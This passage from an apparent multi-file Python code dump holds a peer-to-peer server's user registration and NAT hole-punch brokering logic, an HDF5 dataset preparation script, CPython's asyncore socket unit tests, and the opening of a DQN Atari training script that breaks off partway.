has_alphas_and_numbers = re.match(r"^(?=.+[\w])(?=.+[\d])",password) != None;
return (has_alphas_and_numbers and (len(password) >= 8))
def register_user(self, username, password, profile_map, ip_address, port, registration_type="permanent"):
result = (False, username, profile_map, "Error: Registration failed.");
session = stun_alchemy.Session();
if not self.is_acceptable_password(password):
session.close();
return (False, "Invalid password. Password must be at least 8 characters long and contain both letters and numbers (special characters are optional).");
results = session.query(Stun_User).filter(func.lower(Stun_User.username) == func.lower(username)).all();
if len(results) >= 1:
session.close();
return (False, username, profile_map, "Username is already in use.");
result = [True, username, profile_map, None];
salt_key = auth.create_saltkey(username);
salt = auth.extract_salt_from_key(salt_key)
salt_and_pass = "%s%s" % (salt, password)
hashed_password = hashlib.sha384(salt_and_pass).hexdigest();
user = Stun_User(username=username, password=hashed_password, ip_address=ip_address, port=port, salt_key=salt_key, profile_map=json.dumps(profile_map), logged_in=False);
session.add(user);
session.commit();
session.close();
return result;
def get_unused_port(self, user):
result = None;
if user.available_ports == None:
return None;
available_ports = json.loads(user.available_ports);
used_ports = json.loads(user.used_ports);
print "available_ports: %s" % available_ports;
for port_range in available_ports:
for i in range(port_range[0], port_range[1]):
if i not in used_ports:
return i;
return result;
def update_user_used_ports(self, user, port):
session = stun_alchemy.Session();
used_ports = json.loads(user.used_ports);
used_ports.append(port);
user.used_ports = json.dumps(used_ports);
session.commit();
session.close();
def meta_watch(self):
# in charge of maintaining up-to-date information on users online, their meta data (username, ip, port, and whatever else), and anything else that needs to be reported to clients.
connection_state = self.connection_state
server = self.tcp_server
while connection_state.active:
# Check all logged-in users to see if still logged in.
self.check_login_status_of_all_users();
# Grab peer data from db.
self.peer_map = self.get_active_peer_map();
# Notify all clients of the list of peers.
response = "peer_map %s" % json.dumps(self.peer_map);
self.tcp_server.send_message(response);
time.sleep(self.metainfo_update_thread_sleep_duration);
def handle_hole_punch_request(self, message_body, ip_address, port):
# message_body should be [ip, port, requestee_username, target_ip, target_port, target_username, buffer_size]
message_data = json.loads(message_body);
requestee_ip, requestee_port, username, target_username, buffer_size = message_data
# confirm the requestee is authenticated before proceeding.
if not self.is_authenticated(username, ip_address, port):
recipients = [(ip_address, port),];
response = "hole_punch_request_rejected %s" % json.dumps([0, target_username, "You're not logged in."]);
self.tcp_server.send_message(response, recipients);
return False;
# confirm the target user exists and is active.
peer = self.user_is_active(target_username);
if not peer:
recipients = [(ip_address, port),];
response = "hole_punch_request_rejected %s" % json.dumps([1, target_username, "Peer isn't available (not logged in / doesn't exist)."]);
self.tcp_server.send_message(response, recipients);
return False;
# send request to target_user
selected_port = self.get_unused_port(peer);
# mark it as used (might be overwritten again by a re-auth request, but at any rate,
# it's a small window for screwing up and will correct itself naturally anyway - client will reject if it's already attempting to hole punch on a port).
self.update_user_used_ports(peer, selected_port);
response_data = [peer.auth_ip_address, selected_port, requestee_ip, requestee_port, username, buffer_size];
# [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size]
recipients = [(peer.auth_ip_address, peer.auth_port),];
response = "hole_punch %s" % json.dumps(response_data);
self.tcp_server.send_message(response, recipients);
return True;
def main_listen_loop(self):
connection_state = self.connection_state;
server = self.tcp_server;
message_object = None
while connection_state.active:
try:
message_object = self.tcp_server.pop_message();
self.master_log.append(message_object);
is_valid_message = ((message_object != None) and (len(message_object) > 2));
if is_valid_message:
message = message_object[2];
message_type, message_body = message.split(" ",1);
if message_type not in self.message_log_map:
self.message_log_map[message_type] = [];
self.message_log_map[message_type].append(message_object);
#print "MESSAGE: %s\n" % message_object;
ip_address, port = message_object[0];
if(message_type == "auth_salt_request"):
# message_body should be [username, ]
message_data = message_body;
username = message_data;
# get the salt and key
salt_and_key = self.get_salt_and_key(username, ip_address, port);
response = "auth_keys %s" % json.dumps(salt_and_key);
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
elif(message_type == "authenticate"):
# message_body should be [username, hashed_password, login, available_ports, used_ports]
username, hashed_password, login, available_ports, used_ports = json.loads(message_body);
recipients = [(ip_address, port),];
success, profile_map, error_message = self.authenticate_user(username, hashed_password, ip_address, port, login, available_ports, used_ports);
response_data = [success, username, profile_map, login, error_message]
response = "auth_response %s" % json.dumps(response_data);
self.tcp_server.send_message(response, recipients);
elif(message_type == "register_key"):
# message_body should be "username"
username = message_body;
Thread(target=self.generate_registration_key, args=(ip_address, port, username)).start();
elif(message_type == "register"):
# contents username encrypted_string **ENCRYPTED_STRING**: [username, password, profile_map, registration_type]
username, encrypted_string = message_body.split(" ", 1);
client_key = "%s_%s_%s" % (ip_address, port, username);
key = self.key_map[client_key];
json_string = key.decrypt(encrypted_string);
username, password, profile_map, registration_type = json.loads(json_string);
response_data = self.register_user(username, password, profile_map, ip_address, port, registration_type);
response = "registration_response %s" % json.dumps(response_data);
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
elif(message_type == "request_hole_punch"):
self.handle_hole_punch_request(message_body, ip_address, port);
elif(message_type == "hole_punch_ack"):
# message_body should be [username, ]
message_data = json.loads(message_body);
target_ip, target_port, target_username, requestee_ip, requestee_port, requestee_username, buffer_size, port_in_use = message_data
# message to send: listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size
requestee = self.user_is_active(requestee_username);
if requestee != None:
message_body = json.dumps([requestee_ip, requestee_port, target_ip, target_port, target_username, buffer_size]);
# Send init signal to requestee
response = "init_hole_punch %s" % message_body;
recipients = [(requestee.auth_ip_address, requestee.auth_port),];
self.tcp_server.send_message(response, recipients);
message_body = json.dumps([target_ip, target_port, requestee_ip, requestee_port, requestee_username, buffer_size]);
# Send init signal to target.
response = "init_hole_punch %s" % message_body;
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
elif(message_type == "hole_punch_reject"):
# message_body should be [target_ip, target_port, target_username, requestee_ip, requestee_port, requestee_username, buffer_size, port_in_use]
message_data = json.loads(message_body);
target_ip, target_port, target_username, requestee_ip, requestee_port, requestee_username, buffer_size, port_in_use = message_data
message_body = json.dumps([requestee_ip, requestee_port, requestee_username, target_username, buffer_size])
requestee = self.user_is_active(requestee_username);
if port_in_use:
# Assuming the requestee still exists and is logged in and active, get another port and make another hole_punch request to the target user.
if requestee != None:
self.handle_hole_punch_request(message_body, requestee.auth_ip_address, requestee.auth_port);
else:
# Inform the requestee that the request was rejected.
if requestee != None:
response = "hole_punch_request_rejected %s" % message_body;
recipients = [(requestee.auth_ip_address, requestee.auth_port),];
self.tcp_server.send_message(response, recipients);
except Exception as exc:
self.log_error(exc, message_object);
time.sleep(self.thread_sleep_duration);
|
prepare_dataset.py
|
#!/usr/bin/python
import os
import json
import glob
import utils
import random
import tables
import argparse
import skimage.io
import numpy as np
import multiprocessing
from tqdm import tqdm
from math import ceil
from skimage.morphology import remove_small_objects
def start_process(target, args):
process = multiprocessing.Process(target=target, args=args, daemon=True)
process.start()
return process
def unique(uclasses, classes):
new, uc = [], uclasses[:]
for i in classes:
if i not in uc and i not in new:
new.append(i)
if new:
new.sort()
uclasses.append(new)
def worker(n, files, classes, uclasses, colors, lock, conn):
pbar = tqdm(files, position=n)
uclasses = list(uclasses)
n_colors, n_classes = len(colors), len(classes)
for file in pbar:
pbar.set_description(utils.cut_string(file))
dir, name = os.path.dirname(file), os.path.splitext(os.path.basename(file))[0]
mask = skimage.io.imread(os.path.join(dir, name + '.mask.png'))
mask = mask.reshape((*mask.shape, 1)) if len(mask.shape) <= 2 else mask[:, :, [0]]
mask = mask.repeat(n_colors, axis=2) == colors
ind = [i for i in range(n_classes) if mask[::, ::, i].any()]
if ind:
mask = mask[:, :, ind]
for i in range(mask.shape[-1]):
remove_small_objects(mask[:, :, i], connectivity=2, in_place=True)
with lock:
conn.send((
file,
('image', skimage.io.imread(file)[:, :, :3]),
('mask', mask),
('class_id', np.array([uclasses.index(i) + 1 for i in classes[ind]], dtype='uint8'))
))
pbar.close()
def writer(file, filters, conn, lock):
count, polled, paths = file.root.count[0], True, []
while multiprocessing.active_children() or polled:
polled = conn.poll(1)
if polled:
path, *rest = conn.recv()
for i in rest:
category, value = i
arr = file.create_carray(file.root[category], '_' + str(count), obj=value, filters=filters)
paths.append(path)
count += 1
return paths
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Prepare dataset')
parser.add_argument('directory', metavar='DIR', help='Path to dataset', type=str)
parser.add_argument('-f', '--file', type=str, default='dataset.hdf5', help='HDF5 dataset file', metavar='F')
parser.add_argument('--train', metavar='P', help='Train weight', type=float, default=0.8)
parser.add_argument('--classes', metavar='C', help='Path to classes json', default='types.json')
parser.add_argument('-p', '--processes', type=int, default=1, help='Number of processes', metavar='N')
parser.add_argument('--complevel', type=int, default=9, help='Compression level', metavar='L')
parser.add_argument('--complib', type=str, default='blosc:lz4hc', help='Compression library', metavar='L')
parser.add_argument('--save_path', action='store_true', help='Save image path')
args = parser.parse_args()
assert 0 <= args.train <= 1, 'Train weight must be in range [0, 1]'
classes = np.array([i.encode('ascii') for i in json.load(open(os.path.join(args.directory, args.classes)))])
colors = np.array([i for i in range(1, len(classes) + 1)], dtype='uint8')
filters = tables.Filters(complevel=args.complevel, complib=args.complib)
file = utils.open_or_create_dataset_file(args.file, filters, ('image', 'mask', 'class_id'), True)
unique(file.root.classes, classes)
files = list(filter(lambda x: not x.endswith('.mask.png'), glob.iglob(os.path.join(args.directory, '**/*.png'), recursive=True)))
count = len(files)
random.shuffle(files)
pn, lock, processes = ceil(count / args.processes), multiprocessing.Lock(), []
conn_in, conn_out = multiprocessing.Pipe(False)
for i in range(args.processes):
processes.append(start_process(worker, (i, files[i * pn:(i + 1) * pn], classes, file.root.classes[:], colors, lock, conn_out)))
files = writer(file, filters, conn_in, lock)
for i in processes:
print()
if args.save_path:
utils.save_path(file, filters, files)
utils.split_dataset(file, len(files), args.train)
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
import threading
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
from io import BytesIO
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.monotonic()
while n > 0 and time.monotonic() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
os_helper.unlink(addr)
socket_helper.bind_unix_socket(sock, addr)
else:
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@threading_helper.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = socket_helper.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((socket_helper.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
threading_helper.join_thread(t)
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(os_helper.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_recv(self):
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(os_helper.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(os_helper.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with warnings_helper.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
def test_close_twice(self):
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with socket.socket(self.family) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
@threading_helper.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
with socket.socket(self.family, socket.SOCK_STREAM) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
threading_helper.join_thread(t)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (socket_helper.HOST, 0)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (socket_helper.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = os_helper.TESTFN
def tearDown(self):
os_helper.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
run_dqn_atari.py
|
import argparse
import gym
from gym import wrappers
import os
import time
import random
import numpy as np
import tensorflow as tf
import tensorflow.contrib.layers as layers
from multiprocessing import Process
import dqn
from dqn_utils import *
from atari_wrappers import *
def atari_model(img_in, num_actions, scope, reuse=False):
# as described in https://storage.googleapis.com/deepmind-data/assets/papers/DeepMindNature14236Paper.pdf
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
# original architecture
out = layers.convolution2d(out, num_outputs=32, kernel_size=8, stride=4, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=4, stride=2, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=3, stride=1, activation_fn=tf.nn.relu)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
out = layers.fully_connected(out, num_outputs=512, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
return out
def atari_learn(env,
session,
double,
logdir,
seed,
num_timesteps):
# This is just a rough estimate
num_iterations = float(num_timesteps) / 4.0
lr_multiplier = 1.0
lr_schedule = PiecewiseSchedule([
(0, 1e-4 * lr_multiplier),
(num_iterations / 10, 1e-4 * lr_multiplier),
(num_iterations / 2, 5e-5 * lr_multiplier),
],
outside_value=5e-5 * lr_multiplier)
optimizer = dqn.OptimizerSpec(
